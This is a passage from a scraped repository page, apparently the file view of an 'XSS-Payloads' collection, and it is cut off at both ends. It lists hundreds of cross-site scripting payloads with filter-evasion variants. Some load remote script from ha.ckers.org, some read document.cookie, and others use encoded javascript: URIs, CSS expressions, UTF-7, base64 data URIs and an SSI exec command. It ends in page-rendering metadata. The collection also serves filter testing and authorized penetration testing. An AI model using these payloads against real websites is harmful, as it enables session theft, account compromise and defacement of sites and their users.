HREF=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;css\\\"\u0026gt;\r","\u0026lt;STYLE\u0026gt;@import'http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;css';\u0026lt;/STYLE\u0026gt;\r","\u0026lt;META HTTP-EQUIV=\\\"Link\\\" Content=\\\"\u0026lt;http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;css\u0026gt;; REL=stylesheet\\\"\u0026gt;\r","\u0026lt;STYLE\u0026gt;BODY{-moz-binding\u0026#58;url(\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xssmoz\u0026#46;xml#xss\\\")}\u0026lt;/STYLE\u0026gt;\r","\u0026lt;XSS STYLE=\\\"behavior\u0026#58; url(xss\u0026#46;htc);\\\"\u0026gt;\r","\u0026lt;STYLE\u0026gt;li {list-style-image\u0026#58; url(\\\"javascript\u0026#058;alert('XSS')\\\");}\u0026lt;/STYLE\u0026gt;\u0026lt;UL\u0026gt;\u0026lt;LI\u0026gt;XSS\r","\u0026lt;IMG SRC='vbscript\u0026#058;msgbox(\\\"XSS\\\")'\u0026gt;\r","\u0026lt;IMG SRC=\\\"mocha\u0026#58;\u0026#91;code\u0026#93;\\\"\u0026gt;\r","\u0026lt;IMG SRC=\\\"livescript\u0026#058;\u0026#91;code\u0026#93;\\\"\u0026gt;\r","žscriptualert(EXSSE)ž/scriptu\r","\u0026lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript\u0026#058;alert('XSS');\\\"\u0026gt;\r","\u0026lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=data\u0026#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\"\u0026gt;\r","\u0026lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http\u0026#58;//;URL=javascript\u0026#058;alert('XSS');\\\"\r","\u0026lt;IFRAME SRC=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\u0026lt;/IFRAME\u0026gt;\r","\u0026lt;FRAMESET\u0026gt;\u0026lt;FRAME SRC=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\u0026lt;/FRAMESET\u0026gt;\r","\u0026lt;TABLE BACKGROUND=\\\"javascript\u0026#058;alert('XSS')\\\"\u0026gt;\r","\u0026lt;TABLE\u0026gt;\u0026lt;TD BACKGROUND=\\\"javascript\u0026#058;alert('XSS')\\\"\u0026gt;\r","\u0026lt;DIV STYLE=\\\"background-image\u0026#58; url(javascript\u0026#058;alert('XSS'))\\\"\u0026gt;\r","\u0026lt;DIV STYLE=\\\"background-image\u0026#58;\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028\u0026#46;1027\\0058\u0026#46;1053\\0053\\0027\\0029'\\0029\\\"\u0026gt;\r","\u0026lt;DIV STYLE=\\\"background-image\u0026#58; url(javascript\u0026#058;alert('XSS'))\\\"\u0026gt;\r","\u0026lt;DIV STYLE=\\\"width\u0026#58; expression(alert('XSS'));\\\"\u0026gt;\r","\u0026lt;STYLE\u0026gt;@im\\port'\\ja\\vasc\\ript\u0026#58;alert(\\\"XSS\\\")';\u0026lt;/STYLE\u0026gt;\r","\u0026lt;IMG STYLE=\\\"xss\u0026#58;expr/*XSS*/ession(alert('XSS'))\\\"\u0026gt;\r","\u0026lt;XSS STYLE=\\\"xss\u0026#58;expression(alert('XSS'))\\\"\u0026gt;\r","exp/*\u0026lt;A STYLE='no\\xss\u0026#58;noxss(\\\"*//*\\\");\r","xss\u0026#58;ex\u0026#x2F;*XSS*//*/*/pression(alert(\\\"XSS\\\"))'\u0026gt;\r","\u0026lt;STYLE TYPE=\\\"text/javascript\\\"\u0026gt;alert('XSS');\u0026lt;/STYLE\u0026gt;\r","\u0026lt;STYLE\u0026gt;\u0026#46;XSS{background-image\u0026#58;url(\\\"javascript\u0026#058;alert('XSS')\\\");}\u0026lt;/STYLE\u0026gt;\u0026lt;A CLASS=XSS\u0026gt;\u0026lt;/A\u0026gt;\r","\u0026lt;STYLE type=\\\"text/css\\\"\u0026gt;BODY{background\u0026#58;url(\\\"javascript\u0026#058;alert('XSS')\\\")}\u0026lt;/STYLE\u0026gt;\r","\u0026lt;!--\u0026#91;if gte IE 4\u0026#93;\u0026gt;\r","\u0026lt;SCRIPT\u0026gt;alert('XSS');\u0026lt;/SCRIPT\u0026gt;\r","\u0026lt;!\u0026#91;endif\u0026#93;--\u0026gt;\r","\u0026lt;BASE HREF=\\\"javascript\u0026#058;alert('XSS');//\\\"\u0026gt;\r","\u0026lt;OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/scriptlet\u0026#46;html\\\"\u0026gt;\u0026lt;/OBJECT\u0026gt;\r","\u0026lt;OBJECT classid=clsid\u0026#58;ae24fdae-03c6-11d1-8b76-0080c744f389\u0026gt;\u0026lt;param name=url value=javascript\u0026#058;alert('XSS')\u0026gt;\u0026lt;/OBJECT\u0026gt;\r","\u0026lt;EMBED SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;swf\\\" AllowScriptAccess=\\\"always\\\"\u0026gt;\u0026lt;/EMBED\u0026gt;\r","\u0026lt;EMBED SRC=\\\"data\u0026#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"\u0026gt;\u0026lt;/EMBED\u0026gt;\r","a=\\\"get\\\";\r","b=\\\"URL(\\\\\"\\\";\r","c=\\\"javascript\u0026#058;\\\";\r","d=\\\"alert('XSS');\\\\\")\\\";\r","eval(a+b+c+d);\r","\u0026lt;HTML xmlns\u0026#58;xss\u0026gt;\u0026lt;?import namespace=\\\"xss\\\" implementation=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;htc\\\"\u0026gt;\u0026lt;xss\u0026#58;xss\u0026gt;XSS\u0026lt;/xss\u0026#58;xss\u0026gt;\u0026lt;/HTML\u0026gt;\r","\u0026lt;XML ID=I\u0026gt;\u0026lt;X\u0026gt;\u0026lt;C\u0026gt;\u0026lt;!\u0026#91;CDATA\u0026#91;\u0026lt;IMG SRC=\\\"javas\u0026#93;\u0026#93;\u0026gt;\u0026lt;!\u0026#91;CDATA\u0026#91;cript\u0026#58;alert('XSS');\\\"\u0026gt;\u0026#93;\u0026#93;\u0026gt;\r","\u0026lt;/C\u0026gt;\u0026lt;/X\u0026gt;\u0026lt;/xml\u0026gt;\u0026lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML\u0026gt;\u0026lt;/SPAN\u0026gt;\r","\u0026lt;XML ID=\\\"xss\\\"\u0026gt;\u0026lt;I\u0026gt;\u0026lt;B\u0026gt;\u0026lt;IMG SRC=\\\"javas\u0026lt;!-- --\u0026gt;cript\u0026#58;alert('XSS')\\\"\u0026gt;\u0026lt;/B\u0026gt;\u0026lt;/I\u0026gt;\u0026lt;/XML\u0026gt;\r","\u0026lt;SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"\u0026gt;\u0026lt;/SPAN\u0026gt;\r","\u0026lt;XML SRC=\\\"xsstest\u0026#46;xml\\\" ID=I\u0026gt;\u0026lt;/XML\u0026gt;\r","\u0026lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML\u0026gt;\u0026lt;/SPAN\u0026gt;\r","\u0026lt;HTML\u0026gt;\u0026lt;BODY\u0026gt;\r","\u0026lt;?xml\u0026#58;namespace prefix=\\\"t\\\" ns=\\\"urn\u0026#58;schemas-microsoft-com\u0026#58;time\\\"\u0026gt;\r","\u0026lt;?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"\u0026gt;\r","\u0026lt;t\u0026#58;set attributeName=\\\"innerHTML\\\" to=\\\"XSS\u0026lt;SCRIPT DEFER\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/SCRIPT\u0026gt;\\\"\u0026gt;\r","\u0026lt;/BODY\u0026gt;\u0026lt;/HTML\u0026gt;\r","\u0026lt;SCRIPT SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;jpg\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\r","\u0026lt;!--#exec cmd=\\\"/bin/echo '\u0026lt;SCR'\\\"--\u0026gt;\u0026lt;!--#exec cmd=\\\"/bin/echo 'IPT SRC=http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\u0026gt;\u0026lt;/SCRIPT\u0026gt;'\\\"--\u0026gt;\r","\u0026lt;? echo('\u0026lt;SCR)';\r","echo('IPT\u0026gt;alert(\\\"XSS\\\")\u0026lt;/SCRIPT\u0026gt;'); ?\u0026gt;\r","\u0026lt;IMG SRC=\\\"http\u0026#58;//www\u0026#46;thesiteyouareon\u0026#46;com/somecommand\u0026#46;php?somevariables=maliciouscode\\\"\u0026gt;\r","Redirect 302 /a\u0026#46;jpg http\u0026#58;//victimsite\u0026#46;com/admin\u0026#46;asp\u0026deleteuser\r","\u0026lt;META HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=\u0026lt;SCRIPT\u0026gt;alert('XSS')\u0026lt;/SCRIPT\u0026gt;\\\"\u0026gt;\r","\u0026lt;HEAD\u0026gt;\u0026lt;META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"\u0026gt; \u0026lt;/HEAD\u0026gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\r","\u0026lt;SCRIPT a=\\\"\u0026gt;\\\" SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\r","\u0026lt;SCRIPT =\\\"\u0026gt;\\\" SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\r","\u0026lt;SCRIPT a=\\\"\u0026gt;\\\" '' SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\r","\u0026lt;SCRIPT \\\"a='\u0026gt;'\\\" SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\r","\u0026lt;SCRIPT a=`\u0026gt;` SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\r","\u0026lt;SCRIPT a=\\\"\u0026gt;'\u0026gt;\\\" SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\r","\u0026lt;SCRIPT\u0026gt;document\u0026#46;write(\\\"\u0026lt;SCRI\\\");\u0026lt;/SCRIPT\u0026gt;PT SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\r","\u0026lt;A HREF=\\\"http\u0026#58;//66\u0026#46;102\u0026#46;7\u0026#46;147/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\r","\u0026lt;A HREF=\\\"http\u0026#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\r","\u0026lt;A HREF=\\\"http\u0026#58;//1113982867/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\r","\u0026lt;A HREF=\\\"http\u0026#58;//0x42\u0026#46;0x0000066\u0026#46;0x7\u0026#46;0x93/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\r","\u0026lt;A HREF=\\\"http\u0026#58;//0102\u0026#46;0146\u0026#46;0007\u0026#46;00000223/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\r","\u0026lt;A HREF=\\\"htt p\u0026#58;//6 6\u0026#46;000146\u0026#46;0x7\u0026#46;147/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\r","\u0026lt;A HREF=\\\"//www\u0026#46;google\u0026#46;com/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\r","\u0026lt;A HREF=\\\"//google\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\r","\u0026lt;A HREF=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org@google\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\r","\u0026lt;A HREF=\\\"http\u0026#58;//google\u0026#58;ha\u0026#46;ckers\u0026#46;org\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\r","\u0026lt;A HREF=\\\"http\u0026#58;//google\u0026#46;com/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\r","\u0026lt;A HREF=\\\"http\u0026#58;//www\u0026#46;google\u0026#46;com\u0026#46;/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\r","\u0026lt;A HREF=\\\"javascript\u0026#058;document\u0026#46;location='http\u0026#58;//www\u0026#46;google\u0026#46;com/'\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\r","\u0026lt;A HREF=\\\"http\u0026#58;//www\u0026#46;gohttp\u0026#58;//www\u0026#46;google\u0026#46;com/ogle\u0026#46;com/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\r","\u0026lt;\r","%3C\r","\u0026lt\r","\u0026lt;\r","\u0026LT\r","\u0026LT;\r","\u0026#60\r","\u0026#060\r","\u0026#0060\r","\u0026#00060\r","\u0026#000060\r","\u0026#0000060\r","\u0026lt;\r","\u0026#x3c\r","\u0026#x03c\r","\u0026#x003c\r","\u0026#x0003c\r","\u0026#x00003c\r","\u0026#x000003c\r","\u0026#x3c;\r","\u0026#x03c;\r","\u0026#x003c;\r","\u0026#x0003c;\r","\u0026#x00003c;\r","\u0026#x000003c;\r","\u0026#X3c\r","\u0026#X03c\r","\u0026#X003c\r","\u0026#X0003c\r","\u0026#X00003c\r","\u0026#X000003c\r","\u0026#X3c;\r","\u0026#X03c;\r","\u0026#X003c;\r","\u0026#X0003c;\r","\u0026#X00003c;\r","\u0026#X000003c;\r","\u0026#x3C\r","\u0026#x03C\r","\u0026#x003C\r","\u0026#x0003C\r","\u0026#x00003C\r","\u0026#x000003C\r","\u0026#x3C;\r","\u0026#x03C;\r","\u0026#x003C;\r","\u0026#x0003C;\r","\u0026#x00003C;\r","\u0026#x000003C;\r","\u0026#X3C\r","\u0026#X03C\r","\u0026#X003C\r","\u0026#X0003C\r","\u0026#X00003C\r","\u0026#X000003C\r","\u0026#X3C;\r","\u0026#X03C;\r","\u0026#X003C;\r","\u0026#X0003C;\r","\u0026#X00003C;\r","\u0026#X000003C;\r","\\x3c\r","\\x3C\r","\\u003c\r","\\u003C\r","\u0026lt;iframe src=http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/scriptlet\u0026#46;html\u0026gt;\r","\u0026lt;IMG SRC=\\\"javascript\u0026#058;alert('XSS')\\\"\r","\u0026lt;SCRIPT SRC=//ha\u0026#46;ckers\u0026#46;org/\u0026#46;js\u0026gt;\r","\u0026lt;SCRIPT SRC=http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js?\u0026lt;B\u0026gt;\r","\u0026lt;\u0026lt;SCRIPT\u0026gt;alert(\\\"XSS\\\");//\u0026lt;\u0026lt;/SCRIPT\u0026gt;\r","\u0026lt;SCRIPT/SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\r","\u0026lt;BODY onload!#$%\u0026()*~+-_\u0026#46;,\u0026#58;;?@\u0026#91;/|\\\u0026#93;^`=alert(\\\"XSS\\\")\u0026gt;\r","\u0026lt;SCRIPT/XSS SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\r","\u0026lt;IMG SRC=\\\" javascript\u0026#058;alert('XSS');\\\"\u0026gt;\r","perl -e 'print \\\"\u0026lt;SCR\\0IPT\u0026gt;alert(\\\\\"XSS\\\\\")\u0026lt;/SCR\\0IPT\u0026gt;\\\";' \u0026gt; out\r","perl -e 'print \\\"\u0026lt;IMG SRC=java\\0script\u0026#058;alert(\\\\\"XSS\\\\\")\u0026gt;\\\";' \u0026gt; out\r","\u0026lt;IMG SRC=\\\"jav\u0026#x0D;ascript\u0026#058;alert('XSS');\\\"\u0026gt;\r","\u0026lt;IMG SRC=\\\"jav\u0026#x0A;ascript\u0026#058;alert('XSS');\\\"\u0026gt;\r","\u0026lt;IMG SRC=\\\"jav\u0026#x09;ascript\u0026#058;alert('XSS');\\\"\u0026gt;\r","\u0026lt;IMG SRC=\u0026#x6A\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x70\u0026#x74\u0026#x3A\u0026#x61\u0026#x6C\u0026#x65\u0026#x72\u0026#x74\u0026#x28\u0026#x27\u0026#x58\u0026#x53\u0026#x53\u0026#x27\u0026#x29\u0026gt;\r","\u0026lt;IMG SRC=\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\u0026gt;\r","\u0026lt;IMG SRC=javascript\u0026#058;alert('XSS')\u0026gt;\r","\u0026lt;IMG SRC=javascript\u0026#058;alert(String\u0026#46;fromCharCode(88,83,83))\u0026gt;\r","\u0026lt;IMG \\\"\\\"\\\"\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(\\\"XSS\\\")\u0026lt;/SCRIPT\u0026gt;\\\"\u0026gt;\r","\u0026lt;IMG SRC=`javascript\u0026#058;alert(\\\"RSnake says, 'XSS'\\\")`\u0026gt;\r","\u0026lt;IMG SRC=javascript\u0026#058;alert(\u0026quot;XSS\u0026quot;)\u0026gt;\r","\u0026lt;IMG SRC=JaVaScRiPt\u0026#058;alert('XSS')\u0026gt;\r","\u0026lt;IMG SRC=javascript\u0026#058;alert('XSS')\u0026gt;\r","\u0026lt;IMG SRC=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\r","\u0026lt;SCRIPT SRC=http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\u0026gt;\u0026lt;/SCRIPT\u0026gt;\r","'';!--\\\"\u0026lt;XSS\u0026gt;=\u0026{()}\r","';alert(String\u0026#46;fromCharCode(88,83,83))//\\';alert(String\u0026#46;fromCharCode(88,83,83))//\\\";alert(String\u0026#46;fromCharCode(88,83,83))//\\\\\";alert(String\u0026#46;fromCharCode(88,83,83))//--\u0026gt;\u0026lt;/SCRIPT\u0026gt;\\\"\u0026gt;'\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(String\u0026#46;fromCharCode(88,83,83))\u0026lt;/SCRIPT\u0026gt;\r","';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\r","'';!--\"\u003cXSS\u003e=\u0026{()}\r","\u003cSCRIPT SRC=\u003e\u003c/SCRIPT\u003e\r","\u003cIMG SRC=\"javascript:alert('XSS');\"\u003e\r","\u003cIMG SRC=javascript:alert('XSS')\u003e\r","\u003cIMG SRC=javascrscriptipt:alert('XSS')\u003e\r","\u003cIMG SRC=JaVaScRiPt:alert('XSS')\u003e\r","\u003cIMG \"\"\"\u003e\u003cSCRIPT\u003ealert(\"XSS\")\u003c/SCRIPT\u003e\"\u003e\r","\u003cIMG SRC=\" \u0026#14; javascript:alert('XSS');\"\u003e\r","\u003cSCRIPT/XSS SRC=\"\"\u003e\u003c/SCRIPT\u003e\r","\u003cSCRIPT/SRC=\"\"\u003e\u003c/SCRIPT\u003e\r","\u003c\u003cSCRIPT\u003ealert(\"XSS\");//\u003c\u003c/SCRIPT\u003e\r","\u003cSCRIPT\u003ea=/XSS/alert(a.source)\u003c/SCRIPT\u003e\r","\\\";alert('XSS');//\r","\u003c/TITLE\u003e\u003cSCRIPT\u003ealert(\"XSS\");\u003c/SCRIPT\u003e\r","¼script¾alert(¢XSS¢)¼/script¾\r","\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"\u003e\r","\u003cIFRAME SRC=\"javascript:alert('XSS');\"\u003e\u003c/IFRAME\u003e\r","\u003cFRAMESET\u003e\u003cFRAME SRC=\"javascript:alert('XSS');\"\u003e\u003c/FRAMESET\u003e\r","\u003cTABLE BACKGROUND=\"javascript:alert('XSS')\"\u003e\r","\u003cTABLE\u003e\u003cTD BACKGROUND=\"javascript:alert('XSS')\"\u003e\r","\u003cDIV STYLE=\"background-image: url(javascript:alert('XSS'))\"\u003e\r","\u003cDIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\"\u003e\r","\u003cDIV STYLE=\"width: expression(alert('XSS'));\"\u003e\r","\u003cSTYLE\u003e@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';\u003c/STYLE\u003e\r","\u003cIMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\"\u003e\r","\u003cXSS STYLE=\"xss:expression(alert('XSS'))\"\u003e\r","exp/*\u003cA STYLE='no\\xss:noxss(\"*//*\");xss:\u0026#101;x\u0026#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'\u003e\r","\u003cEMBED SRC=\"\" AllowScriptAccess=\"always\"\u003e\u003c/EMBED\u003e\r","a=\"get\";b=\"URL(ja\\\"\";c=\"vascr\";d=\"ipt:ale\";e=\"rt('XSS');\\\")\";eval(a+b+c+d+e);\r","\u003cSCRIPT SRC=\"\"\u003e\u003c/SCRIPT\u003e\r","\u003cHTML\u003e\u003cBODY\u003e\u003c?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"\u003e\u003c?import namespace=\"t\" implementation=\"#default#time2\"\u003e\u003ct:set attributeName=\"innerHTML\" to=\"XSS\u0026lt;SCRIPT DEFER\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/SCRIPT\u0026gt;\"\u003e\u003c/BODY\u003e\u003c/HTML\u003e\r","\u003cSCRIPT\u003edocument.write(\"\u003cSCRI\");\u003c/SCRIPT\u003ePT SRC=\"\"\u003e\u003c/SCRIPT\u003e\r","\u003cform id=\"test\" /\u003e\u003cbutton form=\"test\" formaction=\"javascript:alert(123)\"\u003eTESTHTML5FORMACTION\r","\u003cform\u003e\u003cbutton formaction=\"javascript:alert(123)\"\u003ecrosssitespt\r","\u003cframeset onload=alert(123)\u003e\r","\u003c!--\u003cimg src=\"--\u003e\u003cimg src=x onerror=alert(123)//\"\u003e\r","\u003cstyle\u003e\u003cimg src=\"\u003c/style\u003e\u003cimg src=x onerror=alert(123)//\"\u003e\r","\u003cobject data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"\u003e\r","\u003cembed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"\u003e\r","\u003cembed src=\"javascript:alert(1)\"\u003e\r","\u003c? foo=\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\r","\u003c! foo=\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\r","\u003c/ foo=\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\r","\u003cscript\u003e({0:#0=alert/#0#/#0#(123)})\u003c/script\u003e\r","\u003cscript\u003eReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x\u003c/script\u003e\r","\u003cscript\u003eObject.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()\u003c/script\u003e\r","\u003cscript src=\"#\"\u003e{alert(1)}\u003c/script\u003e;1\r","\u003cscript\u003ecrypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')\u003c/script\u003e\r","\u003csvg xmlns=\"#\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003c/svg\u003e\r","\u003csvg onload=\"javascript:alert(123)\" xmlns=\"#\"\u003e\u003c/svg\u003e\r","\u003ciframe xmlns=\"#\" src=\"javascript:alert(1)\"\u003e\u003c/iframe\u003e\r","+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-\r","%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-\r","+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-\r","%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-\r","%253cscript%253ealert(document.cookie)%253c/script%253e\r","“\u003e\u003cs”%2b”cript\u003ealert(document.cookie)\u003c/script\u003e\r","“\u003e\u003cScRiPt\u003ealert(document.cookie)\u003c/script\u003e\r","“\u003e\u003c\u003cscript\u003ealert(document.cookie);//\u003c\u003c/script\u003e\r","foo\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\r","\u003cscr\u003cscript\u003eipt\u003ealert(document.cookie)\u003c/scr\u003c/script\u003eipt\u003e\r","%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=)’%3E\r","‘; alert(document.cookie); var foo=’\r","foo\\’; alert(document.cookie);//’;\r","\u003c/script\u003e\u003cscript \u003ealert(document.cookie)\u003c/script\u003e\r","\u003cimg src=asdf onerror=alert(document.cookie)\u003e\r","\u003cBODY ONLOAD=alert(’XSS’)\u003e\r","\u003cscript\u003ealert(1)\u003c/script\u003e\r","\"\u003e\u003cscript\u003ealert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))\u003c/script\u003e\r","\u003cvideo src=1 onerror=alert(1)\u003e\r","\u003caudio src=1 onerror=alert(1)\u003e"],"stylingDirectives":[[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]],"colorizedLines":null,"csv":null,"csvError":null,"dependabotInfo":{"showConfigurationBanner":false,"configFilePath":null,"networkDependabotPath":"/pgaijin66/XSS-Payloads/network/updates","dismissConfigurationNoticePath":"/settings/dismiss-notice/dependabot_